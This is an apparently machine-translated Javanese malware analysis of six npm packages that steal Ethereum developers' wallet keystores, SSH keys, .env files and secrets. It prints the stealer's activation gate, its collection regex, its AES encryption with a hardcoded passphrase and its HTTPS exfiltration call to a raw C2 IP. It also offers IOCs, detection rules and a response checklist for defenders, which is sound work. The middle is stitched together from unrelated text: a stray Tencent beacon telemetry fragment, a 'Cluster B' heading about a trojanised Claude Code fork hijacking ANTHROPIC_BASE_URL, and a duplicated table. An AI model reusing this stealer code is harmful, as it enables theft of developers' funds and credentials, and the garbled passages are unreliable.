TL; DR
Ing tanggal 6 Mei 2026, penerbit npm tunggal, namikazesarada010206, nyebarake enem paket jahat sing nargetake ekosistem pangembang Ethereum, Solidity, lan DeFi.
Paket-paket kasebut, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, Lan web3-utils-core, migunakaké jeneng-jeneng sing masuk akal sing dirancang supaya katon kaya pustaka pembantu kanggo piranti Web3 sing populer.
Kabeh enem paket isine padha telemetry.js berkas kasebut identik karo byte ing kluster, nganggo SHA-256:
Malware ora bisa mlaku nalika instalasi. Ora ana preinstall or postinstall hook. Nanging, iki diaktifake nalika paket diimpor liwat require().
Rincian kuwi penting.
Implant ngenteni nganti pangembang bener-bener nggunakake paket kasebut. Banjur, implan kasebut mriksa apa workstation kasebut katon kaya lingkungan pangembangan Ethereum / Solidity sing nyata. Implan kasebut nggoleki kunci Alchemy utawa Infura, kunci pribadi, mnemonik, kunci deployer, utawa direktori Foundry lokal.
Nèk host-é cocog, sing nyolong bakal nglumpukké kunci pribadi SSH, toko kunci dompet Foundry/Geth/Brownie, .env* file, lan variabel lingkungan sing sensitif. Iki ngenkripsi bundel nganggo AES-256-GCM nggunakake frasa sandhi sing wis di-hardcode lan ngekstrak menyang titik pungkasan IPv4 C2 mentah kanthi verifikasi TLS dipateni.
Sistem Peringatan Awal Malware (MEW) Xygeni ngonfirmasi kabeh enem paket minangka paket sing mbebayani. Bundel laporan penghapusan registri npm lagi ditundha.
Klaster: Enem Paket, Siji Penerbit
Akun penerbit namikazesarada010206 wis disambung menyang alamat Gmail sing durung diverifikasi namikazesarada010206@gmail.com.
Kampanye kasebut muncul minangka publikasi sedina muput tanggal 6 Mei 2026. Kabeh enem paket kasebut diversikake minangka 1.0.0, ora duwé katergantungan runtime, lan mung ngirim telung file:
package.json index.js telemetry.js Dheweke uga ngumumake repositori sumber sing padha:
https://github.com/harunosakura030303-maker/evmchain-config Telung paket pisanan kejiret dening pemindai MEW nalika publikasi pisanan. Telu liyane ditandhani kanthi paksa sawise analis npm review profil penerbit. Sawise byte-identik sing padha telemetry.js dikonfirmasi ing saindenging kluster, banjur ditutup minangka mbebayani amarga konsistensi.
| paket | versi | npm Dipublikasikake | Tiket MEW | putusan |
|---|---|---|---|---|
| inti-viem | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | Gawe angkoro |
| inti-viem-utils | 1.0.0 | 2026-05-06 | #51050 | Gawe angkoro |
| utils-inti-hardhat | 1.0.0 | 2026-05-06 | #51051 | Gawe angkoro |
| evm-utils | 1.0.0 | 2026-05-06 | #51069 | Angkoro, miturut konsistensi |
| utilitas pengecoran | 1.0.0 | 2026-05-06 | #51071 | Angkoro, miturut konsistensi |
| web3-utils-core | 1.0.0 | 2026-05-06 | #51070 | Angkoro, miturut konsistensi |
Strategi penamaan iki gampang nanging efektif.
Paket-paket iki ora niru jeneng hulu sing persis. Nanging, paket-paket iki nggunakake akhiran "utilitas" sing masuk akal kayata -core, -utils, Lan -utils-coreKuwi ndadekake katon kaya pustaka pendamping sing diarepake dening pangembang cedhak karo piranti Web3.
| Paket Jahat | Target sing Sah |
|---|---|
| inti-viem | viem, klien Ethereum TypeScript sing populer |
| inti-viem-utils | viem |
| utils-inti-hardhat | hardhat, lingkungan pangembangan Solidity umum |
| evm-utils | Namespace piranti EVM umum |
| utilitas pengecoran | pengecoran, rantai alat Soliditas |
| web3-utils-core | web3-utils, pembantu Web3.js |
Iki pola "paket tambahan": dudu "Aku iki paket sing sejatine," nanging "Aku katon kaya penolong sing cukup apik ing sekitar paket sing sejatine."
Kanggo para pangembang DeFi sing cepet obah, kuwi wis cukup kanggo nggawe risiko.
Apa sing Kedadeyan Nalika Paket Diimpor
Rantai serangan kasebut cilik, disengaja, lan fokus ing lingkungan pangembangan kripto.
Ora ana pengait instalasi. Nanging, saben paket kalebu index.js sing ngekspor fungsi stub banjur mbukak modul telemetri sing mbebayani.
require('./telemetry').init(); Iki tegese malware kasebut diaktifake nalika diimpor pisanan.
Kuwi migunani sacara operasional kanggo penyerang. Akeh scanner lan sandbox fokus ing prilaku wektu instalasi. Paket iki ngenteni nganti digunakake dening pangembang, skrip build, test suite, utawa jalur runtime.
Gerbang Aktivasi: Mung Diaktifake ing Workstation Pengembang Web3 Nyata
Bagean sing paling penting saka implan yaiku gerbang aktivasi.
Malware iki mriksa variabel lingkungan sing umum ditemokake ing mesin pangembang Ethereum / Solidity:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Iku uga mriksa apa Foundry katon wis diinstal:
fs.existsSync(path.join(os.homedir(), '.foundry')) Yen ora ana kondisi sing bener, fungsi kasebut bakal bali lan ora nindakake apa-apa.
Kuwi ndadekake paket luwih sepi ing lingkungan analisis umum. Sandbox tanpa Foundry, kunci Alchemy, kunci Infura, kunci pribadi, utawa mnemonik bisa uga katon ora mbebayani.
Ing host sing cocog, malware ngenteni 60 nganti 90 detik sadurunge diklumpukake:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Penundaan iki ngurangi korelasi sing jelas antarane impor lan eksfiltrasi. .unref() panggilan uga ngidini proses host metu kanthi normal yen paket kasebut diimpor ing skrip sing umure cendhak.
Iki dudu tumindak cepet-cepet lan cepet-cepet. Iki minangka tumindak nyolong sing dirancang supaya ora mlaku kajaba lingkungan pangembang pancen pantes dicolong.
Apa sing Dikumpulake dening Pencuri
Sawise gerbang aktivasi liwat, malware kasebut nglumpukake saka sumber sing paling penting ing pangembangan Web3: kunci pribadi, panyimpenan kunci dompet, kredensial penyebaran, rahasia awan, token npm, lan konfigurasi proyek lokal.
| sumber | Apa sing Dikumpulake |
|---|---|
| proses.env | Variabel apa wae sing cocog karo /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MMEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Berkas sing ngemot PRIVATE KEY utawa BEGIN OPENSSH, kalebu isi berkas lengkap |
| ~/.pengecoran/toko kunci/* | File keystore dompet pengecoran |
| ~/.ethereum/toko kunci/* | File keystore dompet Geth |
| ~/.brownie/akun/* | File kunci dompet brownie |
| ${cwd}/.env | Isi berkas lengkap |
| ${cwd}/.env.local | Isi berkas lengkap |
| ${cwd}/.env.produksi | Isi berkas lengkap |
| ${cwd}/.env.pangembangan | Isi berkas lengkap |
| jeneng host os.() | Metadata host |
| crypto.randomUUID() | Identifikasi korban/sesi |
| Tanggal.saiki() | Cap wektu koleksi |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com Token ATTA yaiku:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Kita durung bisa ngonfirmasi apa telemetri kasebut minangka analitik operator dhewe utawa saluran sing dimonetisasi kanthi kapisah. Token ATTA padha ing loro sampel sing ditliti.
Klaster B: heibai
claude.hk OAuth Phishing + Pembajakan ANTHROPIC_BASE_URL
Sampel tanggal 1 April minangka cabang kampanye sing luwih kasar lan luwih awal.
heibai:2.1.88-claude.hk-4 diterbitake dening wuguoqiangvip28, akun sing digawe tanggal 7 Juni 2025. Paket kasebut kanthi eksplisit ngowahi versi dhewe nglawan sing sah 2.1.88 Pelepasan antropik.
Iku ora ngganggu CA-cert MITM. Nanging, iku ngapusi pangguna babagan titik pungkasan OAuth.
Tambahan sing mbebayani ing ndhuwur sumber Claude Code sing bocor kalebu:
| sumber | Apa sing Dikumpulake |
|---|---|
| proses.env | Variabel apa wae sing cocog karo /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MMEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | Berkas sing ngemot PRIVATE KEY utawa BEGIN OPENSSH, kalebu isi berkas lengkap |
| ~/.pengecoran/toko kunci/* | File keystore dompet pengecoran |
| ~/.ethereum/toko kunci/* | File keystore dompet Geth |
| ~/.brownie/akun/* | File kunci dompet brownie |
| ${cwd}/.env | Isi berkas lengkap |
| ${cwd}/.env.local | Isi berkas lengkap |
| ${cwd}/.env.produksi | Isi berkas lengkap |
| ${cwd}/.env.pangembangan | Isi berkas lengkap |
| jeneng host os.() | Metadata host |
| crypto.randomUUID() | Identifikasi korban/sesi |
| Tanggal.saiki() | Cap wektu koleksi |
Dhaptar target iki spesifik banget. Iki dudu pencurian browser umum utawa scraping kredensial sing wiyar. Iki ditujokake kanggo para pangembang sing mbangun, nguji, nyebarake, utawa ngoperasikake aplikasi Ethereum.
Kalebu keystore Foundry, Geth, lan Brownie iku penting banget. File-file iki bisa makili akses langsung menyang dompet utawa identitas penyebaran. Yen penyerang bisa masangake karo sandhi, mnemonik, utawa rahasia lingkungan, dheweke bisa uga bisa mindhah dana, nyamar dadi deployer, utawa ngganggu operasi kontrak cerdas.
Enkripsi Sadurunge Eksfiltrasi
Malware kasebut ngenkripsi data sing dikumpulake sadurunge dikirim.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Frasa sandhi sing wis di-hardcode yaiku:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Payload pungkasan dibungkus minangka JSON:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Enkripsi ora nggawe malware luwih maju dhewe. Nanging, enkripsi nggawe inspeksi jaringan luwih angel. Pembela sing ngawasi metu bakal ndeleng muatan JSON, nanging ora kunci sing dicolong, file dompet, utawa .env isi tanpa frasa sandhi lan logika dekripsi sing wis di-hardcode.
Eksfiltrasi menyang IPv4 C2 Mentah
Jalur eksfiltrasi wis diprogram kanthi ketat:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Malware ngirim data menyang:
https://76.13.37.80:8443/api/v1/telemetry Ana rong rincian sing narik kawigaten.
Kapisan, C2 kuwi alamat IPv4 mentah, dudu domain. Iki ngilangi kebutuhan kanggo registrasi domain lan ngindhari sawetara deteksi adhedhasar domain.
Kapindho, verifikasi TLS dipateni karo:
rejectUnauthorized: false Kuwi ngidini malware nampa sertifikat apa wae, kalebu sertifikat sing ditandatangani dhewe. Kanthi tembung liya, penyerang entuk transportasi sing dienkripsi tanpa mbutuhake sertifikat umum sing sah.
Ora ana logika retry lan ora ana host fallback. Kasalahan bakal ditelan kanthi meneng. Iki bakal njaga paket tetep sepi yen C2 offline utawa ora bisa dihubungi.
Napa Kampanye Iki Penting
Umume paket npm sing mbebayani sing ditujokake kanggo para pangembang sing ngoyak kredensial sing amba: token npm, kunci AWS, token GitHub, utawa .npmrc file.
Kampanye iki nyuda target.
Mesin iki nggoleki pratandha yen mesin kasebut duweke pangembang Ethereum utawa Solidity. Banjur, mesin iki narik aset sing penting ing lingkungan kasebut: keystore dompet, kunci pribadi, mnemonik, kunci deployer, .env file, lan kunci SSH.
Kuwi ndadekake kampanye luwih mbebayani kanggo tim Web3 tinimbang pencuri npm umum.
Infeksi sing sukses bisa mbabarake:
- Dompet penyebaran
- Kunci admin kontrak cerdas
- Kunci panyedhiya RPC
- Kredensial penyebaran awan
- token penerbitan npm
- Akses SSH menyang infrastruktur pangembang utawa bangunan
- Rahasia proyek sing disimpen ing
.envfile - Toko kunci dompet kanggo Foundry, Geth, utawa Brownie
Jeneng paket uga nuduhake rekayasa sosial sing jelas. Jeneng-jeneng kasebut ngarahake ekosistem pangembang Web3 liwat jeneng alat sing wis dikenal: viem, hardhat, foundry, evm, Lan web3.
Aktor kasebut ora perlu ngorbanake proyek sing nyata. Dheweke mung butuh pangembang kanggo nginstal apa sing katon kaya paket pendamping sing cukup masuk akal.
Indikator Kompromi lan Deteksi
| Paket lan Penerbit | |
|---|---|
| Field | Value |
| penerbit npm | namikazesarada010206 |
| Email penerbit | namikazesarada010206@gmail.com |
| email diverifikasi | Ora Ana |
| SCM Diverifikasi | Ora Ana |
| Skor reputasi | 1.0 |
| Packages | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-inti |
| versi | Kabeh 1.0.0 |
| Gudang sumber | https://github.com/harunosakura030303-maker/evmchain-config |
| Dikonfirmasi mbebayani | Kabeh enem paket |
| Network | |
|---|---|
| Koleksi | Value |
| Titik pungkasan C2 | https://76.13.37.80:8443/api/v1/telemetry |
| IP C2 | 76.13.37.80 |
| Pelabuhan C2 | 8443/tcp |
| Prilaku TLS | nolakOra sah: palsu |
| Skema muatan | {"v":2,"iv": ,"d": "t": } |
| File lan Hash | |
|---|---|
| Koleksi | Value |
| telemetri.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Tata letak paket | package.json, index.js, telemetry.js |
| Cacahing berkas | 3 |
| Kira-kira ukuran total | 3.4 KB |
Sinyal Aktivasi
Malware kasebut mriksa variabel lingkungan iki:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Iku uga mriksa:
~/.foundry/ Jalur Host sing Ditargetkan
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Regex Koleksi
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Cathetan Deteksi
Ana sawetara aturan sing bisa nglacak kampanye iki tanpa mbutuhake analisis perilaku lengkap.
Kapisan, pindai file kunci kanggo enem jeneng paket mbebayani:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Sembarang pertandingan ing package-lock.json, yarn.lock, pnpm-lock.yaml, utawa node_modules sejarah kudu dianggep minangka kedadeyan serius.
Kapindho, pantau proses Node.js sing maca jalur keystore dompet:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Iki arang dadi prilaku sing sah kanggo paket sing diimpor minangka dependensi helper. Iki luwih curiga nalika diterusake karo aktivitas jaringan metu.
Katelu, blokir utawa wenehi tandha babagan sambungan HTTPS menyang:
76.13.37.80:8443 Utamane nalika jalur panjalukan yaiku:
/api/v1/telemetry Kaping papat, goleki paket npm sing nggabungake sipat-sipat iki:
- Penerbit anyar utawa sing reputasine kurang apik
- Akun Gmail sing durung diverifikasi
- Jeneng paket sing jejer karo Web3
- Ora ana riwayat repositori sing penting
- Tata letak paket cilik
index.jssing ngunggah file telemetri utawa helper- Ora ana katergantungan runtime
- Koleksi variabel lingkungan sing sensitif
- Akses toko kunci dompet
Pola iki luwih migunani tinimbang siji IOC amarga paket sabanjure bisa uga ngganti alamat IP nanging tetep nganggo logika penargetan sing padha.
Daftar Priksa Respon Kompromi
Yen pangembang nggunakake salah siji saka enem paket lan lingkungane cocog karo gerbang aktivasi, anggo workstation kasebut minangka sing wis disusupi.
Iku kalebu mesin sing wis diinstal Foundry, kunci Alchemy utawa Infura ing lingkungan kasebut, kunci pribadi, mnemonik, utawa kunci deployer.
Tanggapan sing disaranake:
- Pedhot sambungan host saka jaringan.
- Ngreksa
node_modules, file kunci, riwayat cangkang, lan log sing relevan kanggo forensik. - Puter saben pasangan tombol SSH ing ngisor iki
~/.ssh/. - Puter kunci dompet kanggo saben papan panyimpenan kunci ing ngisor iki
~/.foundry,~/.ethereum, Lan~/.brownie. - Pindhah dana menyang dompet anyar.
- Muter saben rahasia sing disimpen ing
.env*file ing repositori sing digunakake pangembang kanggo nggarap. - Rotasi rahasia lingkungan sing cocog karo regex koleksi, kalebu kunci AWS, token npm, token penyebaran, kunci API, kunci pribadi, wiji, lan mnemonik.
- Aktivitas audit cloud, npm, GitHub, panyedhiya RPC, lan blockchain wiwit paket kasebut pisanan diinstal.
- Gambar maneh workstation sadurunge digunakake maneh.
Apa sing kudune dijupuk dening para pembela
Kampanye iki nuduhake kepiye typosquatting npm berkembang ing sekitar ekosistem pangembang sing bernilai tinggi.
Aktor kasebut ora butuh kegigihan. Dheweke ora butuh kebingungan. Dheweke malah ora butuh eksekusi wektu instalasi.
Nanging, dheweke ngandelake telung perkara:
- Jeneng paket Web3 sing masuk akal
- Aktivasi mung ing mesin pangembangan kripto nyata
- Pencurian langsung file lan rahasia sing paling penting kanggo para pangembang Ethereum
Kuwi ndadekake kampanye gampang luput nalika dipindai kanthi wiyar lan mbebayani nalika ana ing lingkungan sing pas.
Kanggo tim Web3, piwulange cetha: nganggep jeneng katergantungan minangka bagean saka model ancaman sampeyan. Paket sing katon kaya pembantu sing ora mbebayani isih bisa dadi dalan paling cendhak kanggo kompromi dompet.
Wis dilapurake menyang registri npm. Kita bakal nganyari kiriman iki nalika akun lan paket penerbit dibusak.




